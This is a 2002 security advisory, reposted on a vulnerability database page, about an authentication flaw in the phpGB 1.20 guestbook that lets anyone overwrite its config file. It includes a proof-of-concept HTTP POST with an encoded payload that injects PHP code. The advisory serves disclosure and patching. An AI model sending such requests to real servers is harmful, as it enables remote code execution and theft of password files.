Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:3475
HistorySep 10, 2002 - 12:00 a.m.

phpGB: DoS and executing_arbitrary_commands

2002-09-1000:00:00
vulners.com
29
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ppp-design found the following design error in phpGB:

Details

Product: phpGB
Affected Version: 1.20 and maybe all versions before
Immune Version: 1.30
OS affected: all OS with php
Vendor-URL: http://www.walzl.net
Vendor-Status: informed, new version avaiable
Security-Risk: high - very high
Remote-Exploit: Yes

Introduction

phpGB ist a php/mysql based guestbook. Admin can change all settings
within a php interface. Unfortunately the script lacks correct
authentification, so everybody is able to override a config file,
which leads to a DoS or to running arbitrary php commands on the server.

More details

The problem is in /admins/savesettings.php. The only check for
authentification is made is a check for the page being requested via
POST. That is why it is very easy to fake authentification and to
write anything to /include/config.php. Because this is a major file of
the software being included nearly on every page, a syntax error
leads to a DoS of the whole guestbook. One more security aspect is
the ability to insert arbitrary commands in the config file. When
avoiding syntax errors, a possible blackhat is able to execute any
php command on the server.

Proof-of-concept

After running the following proof of concept, you are presented with
phpinfo() on every page of the guestbook. Of course you can insert any
php code instead of phpinfo(); into /include/config.php. (\n is newline)

telnet example.com 80\n
POST /phpGB/admin/savesettings.php HTTP/1.0\n
Content-Type: application/x-www-form-urlencoded\n
Content-Length: 123\n
dbpassword=%22%3Bphpinfo%28%29%3B%24a%3D%22&toolbar=1
&messenger=1&smileys=1&title=1&db_session_handler=0
&all_in_one=0&test=\n
\n

Temporary-fix

Use .htaccess to restrict access to admin pages.

Fix

Use at least phpGB 1.30.

Security-Risk

Because a attacker is able to execute any php command, he is able to
read all files including .htaccess or .htpasswd files or any password
protected pages. Depending on system security he might be able to run
any shell command on the server. That is why we are rating this
security issue to high - very high.

Vendor status

After we have informed the author he needed about 12 hours for a new
version.

Disclaimer

All information that can be found in this advisory is believed to be
true, but maybe it isn't. ppp-design can not be held responsible for
the use or missuse of this information. Redistribution of this text is
only permitted if the text has not been altered and the original
author ppp-design (http://www.ppp-design.de) is mentioned.

This advisory can be found online:
http://www.ppp-design.de/advisories.php

ppp-design
http://www.ppp-design.de
Public-Key: http://www.ppp-design.de/pgp/ppp-design.asc
Fingerprint: 5B02 0AD7 A176 3A4F CE22 745D 0D78 7B60 B3B5 451A
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Weitere Infos: siehe http://www.gnupg.org

iD8DBQE9fE2GDXh7YLO1RRoRAlWWAKC04HZKIMU/NLI+enSLY4cnUkbTLACg4Cwd
18owgIsobHKb8pHxPfW8TqY=
=ZS2f
-----END PGP SIGNATURE-----

JSON